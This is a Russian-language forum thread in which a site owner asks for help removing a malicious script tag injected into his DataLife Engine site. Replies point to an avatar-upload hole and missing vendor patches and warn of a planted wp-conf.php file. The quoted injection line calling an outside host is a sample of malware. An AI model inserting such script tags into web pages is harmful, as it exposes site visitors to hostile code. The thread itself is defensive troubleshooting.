Вредоностный код

[Farstrike 0]

Привет всем ребят , делема у меня. Сёдня прислал яша что на моём сайте вредносный код. Проверил комп на вирусы,зачистил все куки , сменил пароли на фтп и админке. Вся фишка в исходной страницы сайта он есть

<script type="http://up.bot.nu/go/889"></script>

Но в в шаблоне сайта не где не могу найти его, на фтп тоже не замечаю, подскажите что делать ?

Мой сайт http://www.interbis.ru/

Изменено 5 апреля 2013 пользователем Farstrike

[Klemanso 15]

как и чем искал в шаблоне то ?

уж если фраза есть, то быть она может только в двух местах: или шаблон - или БиДэ

из ниоткуда то ей никак не взяться

[Farstrike 0]

Ещё момент , нашёл это код в engine/data/dbconfig удалил , теперь нужна помощь что бы залатать дыру . Как я понял это при регистрации , когда можно залить аватар. Дыра поидее сразу в трех файлах а именно в:

engine/inc/editusers.php

engine/modules/register.php

engine/modules/profile.php

Что же нужно сделать ? отключить полностью аватарки или есть другой способ???

[celsoft 6 076]

Farstrike,

Все необходимые патчи вышли еще несколько месяцев назад http://dle-news.ru/bags/ а у вас они не были установлены, в частности для этого не был установлен патч http://dle-news.ru/bags/v96/1547-patchi-bezopasnosti-dlya-versiy-97-i-nizhe.html

[Farstrike 0]

Спасибо за помощь

[Klemanso 15]

дубль -2

участилось появление файлика wp-conf.php

или в корне - или в скриптах

лежит себе тихонечко, с разрешениями на запись и т.п.

следите за сайтами !

Изменено 7 апреля 2013 пользователем Klemanso